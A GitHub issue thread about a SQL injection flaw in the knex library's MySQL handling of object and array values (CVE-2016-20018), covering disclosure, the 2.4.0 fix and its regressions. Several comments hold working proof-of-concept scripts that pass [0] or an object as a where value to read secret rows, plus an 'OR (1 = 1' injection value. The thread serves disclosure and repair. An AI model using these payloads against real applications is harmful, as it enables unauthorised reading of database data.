### ISSUE TITLE
knex where is not escaping field objects with mysql engine (potential SQL injection?)

### ISSUE THREAD

**Issue by TheThing** [tgriesser/knex#1227]
This is a really weird bug but if you do:

```
knex('sometable').where({
  stringfield: { hello: 1 }
})
```

It will crash with `Unknown column 'hello' in 'where clause']` which is an EXTREMELY scary message to see considering the almost potential(?) possibility of doing SQL injection or something.

This only happens though when using the `mysql` client, tested with `pg` and it worked as it should, giving empty result.

Here's a working gist reproducing the problem: https://gist.github.com/TheThing/00be586e2d71e7b9a4b8

**Comment by raijinsetsu** [comment]
I'm not seeing this in the SQL. v0.10.0.0 of knex is what I'm using
```
let knex = require('knex')({
        client: 'mysql',
        connection: {
                host: '127.0.0.1',
                user: 'root',
                password: 'none',
                database: 'none'
        }
});

console.log(knex.table('table').select('id').where({
        field: {hello: 1}
}).toString());
```
This yields the correct SQL:
```
select `id` from `table` where `field` = '{"hello":1}'
```
Also tried values that should have escapes and everything was escaped correctly.

**Comment by TheThing** [comment]
Yeah they yield correct SQL. They also yield correct SQL inside the error:

```
{ [Error: select * from `user_test` where `username` = '{"nope":1}' - ER_BAD_FIELD_ERROR: Unknown column 'nope' in 'where clause']
  code: 'ER_BAD_FIELD_ERROR',
  errno: 1054,
  sqlState: '42S22',
  index: 0 }
```

If I copy-pasta the SQL from the error into an actual mysql console it works. If I toString the query, it generates a valid output:

```
> console.log(client('user_test').where({ username: { nope: 1 } }).toString())
select * from `user_test` where `username` = '{"nope":1}'
```

Yet when I attempt to execute it I STILL throws with `unknown column nope in where` error every time.

**Comment by elhigu** [comment]
This might be related to https://github.com/tgriesser/knex/pull/1269

**Comment by alokmenghrajani** [comment]
Friendly ping reminding that this issue isn't fixed in the latest version (2.3.0) even though https://github.com/knex/knex/pull/1269 has been merged. Probably worth investigating what's going on, happy to provide a different demonstration of why this results in a SQLi.

**Comment by alokmenghrajani** [comment]
Here is a simple proof of concept. An attacker controlled variable ends up reading a database row.

```javascript
// If you don't have a mysql server running, you can use:
// docker run --name poc-mariadb --env MARIADB_USER=poc --env MARIADB_PASSWORD=secret --env MARIADB_ROOT_PASSWORD=secret -v `pwd`/data/:/var/lib/mysql -p 3306:3306 mariadb:latest

const knexConfig = {
  "client": "mysql",
   "connection": {
     "host": "127.0.0.1",
     "port": "3306",
     "user": "root",
     "password": "secret",
     "charset": "utf8mb4"
   }
}
let knex = require('knex')(knexConfig);

const attackerControlled = [0];

async function go() {
  await knex.raw('DROP DATABASE IF EXISTS poc;');
  await knex.raw('CREATE DATABASE poc;');
  knexConfig.connection.database = "poc";
  knex = require('knex')(knexConfig);

  await knex.schema.createTable('poc', function(table) {
    table.increments('id').primary();
    table.string('x').notNullable();
  });

  // assume the database has a secret row
  await knex('poc').insert({
      x: "something secret",
  });

  // userControlled leaks the secret row
  const data = await knex('poc')
    .select()
    .where({ x: attackerControlled })
  console.log(data);
}
go().then(() => process.exit());
```

**Comment by r2dev2** [comment]
> Here is a simple proof of concept. An attacker controlled variable ends up reading a database row.
> 
<details>
  <summary>Exploit</summary>
> ```js
> // If you don't have a mysql server running, you can use:
> // docker run --name poc-mariadb --env MARIADB_USER=poc --env MARIADB_PASSWORD=secret --env MARIADB_ROOT_PASSWORD=secret -v `pwd`/data/:/var/lib/mysql -p 3306:3306 mariadb:latest
> 
> const knexConfig = {
>   "client": "mysql",
>    "connection": {
>      "host": "127.0.0.1",
>      "port": "3306",
>      "user": "root",
>      "password": "secret",
>      "charset": "utf8mb4"
>    }
> }
> let knex = require('knex')(knexConfig);
> 
> const attackerControlled = [0];
> 
> async function go() {
>   await knex.raw('DROP DATABASE IF EXISTS poc;');
>   await knex.raw('CREATE DATABASE poc;');
>   knexConfig.connection.database = "poc";
>   knex = require('knex')(knexConfig);
> 
>   await knex.schema.createTable('poc', function(table) {
>     table.increments('id').primary();
>     table.string('x').notNullable();
>   });
> 
>   // assume the database has a secret row
>   await knex('poc').insert({
>       x: "something secret",
>   });
> 
>   // userControlled leaks the secret row
>   const data = await knex('poc')
>     .select()
>     .where({ x: attackerControlled })
>   console.log(data);
> }
> go().then(() => process.exit());
> ```
</details>

I modified this to use an `attackerControlled = 0` and I still retrieved the secret row. With both `attackControlled = [0]` and `attackControlled = 0`, the sql generated by knex is 

```sql
select * from `poc` where `x` = 0
```

I ran that query in a mariadb shell and that query also returned the secret row. Interestingly, that same query does not return any row in sqlite3.

![mariadb execution](https://user-images.githubusercontent.com/50760816/203876020-4d17da1d-8560-4236-a4ed-02ac1fca37e9.png)

It seems that the solution to this issue may be to have knex call `.toString()` on each value passed in as an object. When I change `attackerControlled` to `attackerControlled.toString()`, it properly does not return the secret row. This solution also works for columns where the type is bigint.

**Comment by Ccamm** [comment]
An alternative PoC is to use an object to query using a different column instead of the intended one.

```js
const knex = require('knex')({
    client: 'mysql2',
    connection: {
        host: '127.0.0.1',
        user: 'root',
        password: 'supersecurepassword',
        database: 'poc',
        charset: 'utf8'
    }
})

knex.schema.hasTable('users').then((exists) => {
    if (!exists) {
        knex.schema.createTable('users', (table) => {
            table.increments('id').primary()
            table.string('name').notNullable()
            table.string('secret').notNullable()
        }).then()
        knex('users').insert({
            name: "admin",
            secret: "you should not be able to return this!"
        }).then()
        knex('users').insert({
            name: "guest",
            secret: "hello world"
        }).then()
    }
})

attackerControlled = {
    "name": "admin"
}

knex('users')
    .select()
    .where({secret: attackerControlled})
    .then((userSecret) => console.log(userSecret))
```
The built SQL query is as follows

```sql
select * from `users` where `secret` = `name` = 'admin'
```
MySQL will ignore the `` `secret` = `` part of the query resulting in the following equivalent query

```sql
select * from `users` where `name` = 'admin'
```
A syntax error is returned if there weren't quoted identifiers in the query. However, the quoted identifiers are needed so that wouldn't be a solution.

I am just about to release an article about this issue since it impacts a lot of other packages. The issue isn't just with `knex`, developers using `knex` also assumed that users cannot send JS objects. Yet NodeJS supports dynamic typing of input variables ([example of changing input type using GET parameters](https://cheatsheetseries.owasp.org/cheatsheets/Nodejs_Security_Cheat_Sheet.html#perform-input-validation)).

A simple solution would be to reject all object and array type variables for column names and values for querying. Personally I don't see a good reason for allowing column names and values to be allowed as an array or object.

**Comment by rgmz** [comment]
FYI @OlivierCavadenti (you seem to be the most active maintainer).

**Comment by rgmz** [comment]
Since there hasn't been any movement on this, I went ahead and requested [CVE-2016-20018](https://nvd.nist.gov/vuln/detail/CVE-2016-20018). Full credit to the people in this issue.

**Comment by TheThing** [comment]
Augh, why would you request a CVE like that? :-/

**Comment by rgmz** [comment]
I should clarify that this wasn't a decision made lightly. I had a vendor's private research team validate this. I then attempted to contact the maintainer myself, and even reached out to the GitHub security team who themselves attempted to contact them; neither of us have heard back after a few weeks.

@Ccamm released an excellent and in-depth article explaining this vulnerability. It's a great read (and I look forward to their future articles), but unfortunately means that the cat is fully out of the bag at this point.

**Comment by attritionorg** [comment]
The article for reference: https://www.ghostccamm.com/blog/knex_sqli/

**Comment by kevinbackhouse** [comment]
Hi! I'm a member of GitHub Security Lab and can confirm that @rgmz reached out to us a few weeks ago for advice. We also attempted to contact the maintainers without success, so we recommended that @rgmz should request a CVE for this issue.

**Comment by kibertoad** [comment]
Unfortunately, I do not currently have time for a quick fix; I can look into this in January; or review any fixes that community might provide.

**Comment by kibertoad** [comment]
@rgmz I didn't receive any communication from your side via email or twitter, could you please confirm which communication channel did you use? I did have a brief exchange with @alokmenghrajani on this topic, however.

**Comment by alokmenghrajani** [comment]
Having a CVE isn't bad per se: many libraries build on top of knex. Being able to automatically update recursive dependencies once a fix is out will benefit everyone!

The important thing right now is to get a fix out.

@kibertoad: what do you think of the earlier suggestion:

> It seems that the solution to this issue may be to have knex call .toString() on each value passed in as an object. When I change attackerControlled to attackerControlled.toString(), it properly does not return the secret row. This solution also works for columns where the type is bigint.

**Comment by antoniopuero** [comment]
hey I made a pr to mitigate the issue, could you pls check? https://github.com/knex/knex/pull/5417 @kibertoad

**Comment by OlivierCavadenti** [comment]
@antoniopuero I will check the pr as soon as possible. Could be nice to release a version after that

**Comment by piyushchauhan2011** [comment]
> hey I made a pr to mitigate the issue, could you pls check? #5417 @kibertoad

Thank you

**Comment by sgarbesi** [comment]
This is coming up in Dependabot and has been blogged about.

![image](https://user-images.githubusercontent.com/155986/210151303-4825ed05-c5c3-47b3-9b00-0aac7dcd8384.png)

**Comment by joao-moonward** [comment]
any news?

**Comment by dvoraqs** [comment]
> any news?

There's more info in the PR above ([5417](https://github.com/knex/knex/pull/5417)), but as of now it looks like a release will go out tomorrow.

**Comment by yagop** [comment]
This is breaking some CI pipelines. Why was this considered a vulnerability?

The code pointed out is clearly wrong as it's using a object (Array) rather than a string or number.

So the problem [here](https://www.ghostccamm.com/blog/knex_sqli/) is the developer using the library wrong. Not knex itself.

Would you consider the following code a vuln in Knex?

```js
const attackerControlled = "scriptKiddieSQLi'";
knex.raw(`select * from users where id = ${attackerControlled}`);
```
I hope not. I would request Github to reconsider CVE-2016-20018

**Comment by kibertoad** [comment]
Fix was released in 2.4.0, please validate.

**Comment by alokmenghrajani** [comment]
Confirming the vuln looks fixed from my point of view and this issue can be closed. Thanks everyone!

**Comment by nnicolosi** [comment]
What else is required to close this issue?

**Comment by tienya** [comment]
The raw function has the same issue.

```js
knex.raw('select * from users where id = ?', [{ hello: 1 }]);
```
error
```
ER_BAD_FIELD_ERROR: Unknown column 'hello' in 'where clause'
```

**Comment by peterdenham** [comment]
> ```js
> let knex = require('knex')({
>         client: 'mysql',
>         connection: {
>                 host: '127.0.0.1',
>                 user: 'root',
>                 password: 'none',
>                 database: 'none',
>                 stringifyObjects: true, // set to true can fix this issue
>         }
> });
> ```

`stringifyObjects: true` does not appear to cover the case where an attacker passes `[0]` to the where clause.

**Comment by tienya** [comment]
Yes. `stringifyObjects: true` does not to cover the case where an attacker passes [0] to the where clause.

Executing the following statement will return all the rows in the table.

```js
knex.raw('select * from test where strfield = ?', [0]); // or [[0]]
```

Because of
```sql
select 'char' = 0;
```
always return `1`.

This is caused by implicit type conversion of MySQL.

If it is a string type compared to a number 0, the result is always `true`.

Refer to 

https://dev.mysql.com/doc/refman/8.0/en/type-conversion.html

> In all other cases, the arguments are compared as floating-point (double-precision) numbers. For example, a comparison of string and numeric operands takes place as a comparison of floating-point numbers.

Therefore, strict parameter type checking is required to avoid being attacked.

**Comment by Cellule** [comment]
What is the proper way to do a `where in` in raw now then?
I have some query built like
```ts
knex(table).whereRaw(`${additionalHardToExplainCheck} AND id in (??)`, [ids /* this is an array of numbers */])
```

This used to work, but the mitigation added in 2.4.0 now fails.
Does it mean the code I wrote above wasn't escaping `ids` properly? 
If so, what is the proper way to avoid/detect this before all these crashes hit production? (unit test found a bunch, but I'm worried I missed some)

**Comment by Cellule** [comment]
I just tested real quick and at least in the scenario I pointed out above, knex was indeed escaping properly. 
Using debugger, I injected malicious data in "ids" (which is not user controllable btw in my case) and I got the following

```sql
select * from table where and field IN (`99) OR (1 = 1`)
```

So it really sounds like the mitigation was too aggressive and prevented legitimate ways of using whereRaw.

On top of that, the typings for the bindings clearly show that at least some forms of object/arrays are legit
https://github.com/knex/knex/blob/0d27bcb60b9bfd57fabf896715350089e0b1050c/types/index.d.ts#L2068-L2076
https://github.com/knex/knex/blob/0d27bcb60b9bfd57fabf896715350089e0b1050c/types/index.d.ts#L494-L506

So why were the typings not updated as well?

**Comment by Cellule** [comment]
To top it up, I now have a scenario I have no idea how to avoid passing an Array in the bindings
```ts
query.whereRaw(`??->"$.someId" IN (?)`, [column, listOfIds]);
```

I feel the check should at least allow Array of primitives and not block on any and all arrays

**Comment by SwamixD** [comment]
Why this issue still in open?

**Comment by SwamixD** [comment]
Why this issue still open? @kibertoad @OlivierCavadenti

**Comment by Cellule** [comment]
@SwamixD Because that assertion is a work around the problem and it is too aggressive causing legitimate use cases to error out

**Comment by SwamixD** [comment]
Okay @Cellule, hope it will gets fixed soon.

**Comment by hkmsadek** [comment]
Last night we noticed this issue, is there any solution? For now validating the input as string would protect but knex should have a solution and treat as string

**Comment by OlivierCavadenti** [comment]
So still no fixed at all ? (I also see https://github.com/knex/knex/issues/5500)
I have unfortunately been absent for months can I have a summary of the remaining concerns? 
I will see to close this topic quickly.

**Comment by Cellule** [comment]
From my perspective, the assertion added here is too aggressive
https://github.com/knex/knex/blob/2ad77199233fd775e710055bd333b655ca1bc92c/lib/dialects/mysql/query/mysql-querycompiler.js#L166-L183

The goal was to block complex input like Array of objects or object with properties with object

So we should change the assertion to block these in particular, or at least allow valid slightly-less complicated input that match these types
https://github.com/knex/knex/blob/0d27bcb60b9bfd57fabf896715350089e0b1050c/types/index.d.ts#L494-L506

In particular, the assertion should accept Array of primitives and Object with primitive properties
I'd also recommend to change `object` in this list to `Record<string, string | number | boolean | null | Date>`

Could replace `isPlainObjectOrArray` by the following.
I tried to be thorough, but I might have missed something 

```js
const isInvalidValue = (value) => {
  if (isPlainObject(value)) {
    // Make sure all the properties are primitives
    // object escaping uses JSON.stringify so we must list properties exactly the same way and make sure `toJSON` method is valid/expected
    // https://github.com/knex/knex/blob/2ad77199233fd775e710055bd333b655ca1bc92c/lib/util/string.js#L56-L62
    // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/JSON/stringify
    // Object.values uses same algorithm to list properties in an object as JSON.stringify as explained in ^MDN article
    return !Object.values(value).every(
      (property) =>
        isString(property) ||
        isNumber(property) ||
        isBoolean(property) ||
        isNull(property) ||
        // What if Date.prototype.toJSON is overridden?
        // That could be a concern in a lot of other scenarios too, unclear if it's a risk
        (isDate(property) && property.toJSON === Date.prototype.toJSON)
    );
  }
  if (Array.isArray(value)) {
    // Make sure all the items are primitives
    return !value.every(
      (item) =>
        isString(item) ||
        isNumber(item) ||
        isBoolean(item) ||
        // What if Date.prototype.toJSON is overridden?
        // That could be a concern in a lot of other scenarios too, unclear if it's a risk
        (isDate(item) && item.toJSON === Date.prototype.toJSON)
    );
  }
  return false;
};
```

**Comment by Cellule** [comment]
As for the CVE itself, I'm not entirely sure, the assertion seems to catch a lot of cases.
The only thing I can think of is to change `escapeObject`'s JSON.stringify to only do it on primitives?
I'm not sure if there's a use case at all to output a JSON serialized object to a query ever. But I might be focusing too much on the Knex.Raw case and not on the whereBasic case

**Comment by Cellule** [comment]
Any updates ? It's been 2 months now and this problem is preventing me from updating to ^2.4 because it still crashes on perfectly legitimate calls

**Comment by TheThing** [comment]
Are you using mysql @Cellule?

**Comment by Cellule** [comment]
> Are you using mysql @Cellule?

Yes

**Comment by biaomingzhong** [comment]
The CVE issues are still showing. How do I bypass the CVE scanner?

**Comment by mercmobily** [comment]
OK a little summary... I am getting lost in the thread.

This issue is partially resolved but still has outstanding concerns that prevent it from being fully closed. The core SQL injection vulnerability (CVE-2016-20018) was addressed in version 2.4.0 released in January 2023, but the fix has introduced new problems that affect legitimate use cases.

The vulnerability originally arose because Knex was not properly handling object and array values passed to WHERE clauses, particularly with MySQL. When objects or arrays were passed as values, they could be interpreted as column references rather than values, leading to SQL injection opportunities. The proof-of-concept demonstrations by @alokmenghrajani and @Ccamm clearly showed how attackers could exploit this to read unauthorised database rows or bypass WHERE clauses entirely.

The initial fix implemented in PR #5417 added assertions to prevent objects and arrays from being used in WHERE clauses. The implementation can be found in lib/dialects/mysql/query/mysql-querycompiler.js:185-198, which adds checks using the isPlainObjectOrArray function to reject these types of values entirely. This successfully prevents the SQL injection vulnerability, as confirmed by @alokmenghrajani after testing version 2.4.0.

However, this fix has proven to be overly aggressive and is now blocking legitimate use cases. @Cellule has identified several scenarios where arrays of primitives should be allowed, particularly for WHERE IN clauses using whereRaw. The current implementation throws errors for perfectly valid queries like using an array of IDs in a WHERE IN clause, which previously worked correctly and were properly escaped.

The remaining issues that need addressing include:

1. The assertion is too broad - it blocks all arrays and objects, even when they contain only primitive values that would be safely escaped
2. TypeScript definitions still indicate that arrays and objects are valid binding types, creating a mismatch between types and runtime behaviour
3. Legitimate use cases like WHERE IN clauses with arrays of primitives are now broken
4. The stringifyObjects connection option for MySQL is not enabled by default, which could help mitigate some edge cases

@Cellule has proposed a more nuanced solution that would check whether arrays contain only primitives and objects contain only primitive properties, rather than blocking all complex types entirely. This would maintain security whilst restoring functionality for legitimate use cases.

Additionally, @tienya has highlighted that the raw function has similar issues and that MySQL's implicit type conversion can still cause unexpected behaviour when numbers like 0 are passed as values for string columns, though this is more of a MySQL behaviour issue than a Knex vulnerability.

The maintainers, particularly @kibertoad and @OlivierCavadenti, have acknowledged the issue and merged the initial security fix, but the concerns about legitimate use cases being broken have not yet been addressed. @OlivierCavadenti asked for a summary of remaining concerns in February 2023, and @Cellule provided detailed feedback, but no further fixes have been implemented as of the last activity on this issue.

In summary, whilst the critical SQL injection vulnerability has been patched in version 2.4.0 and later, the fix has created regression issues that break legitimate functionality. The issue remains open because a more refined solution is needed that maintains security whilst allowing safe use of arrays and objects containing primitive values.

Related Issues:

- #5420: Knex.js has a limited SQL injection vulnerability (closed)
- #5500: Vulnerability CVE-2016-20018 (closed)
- PR #5417: 1227: add assertion for basic where clause values (merged)
- PR #1269: Fix valuesForUndefined actual query being executed (merged)
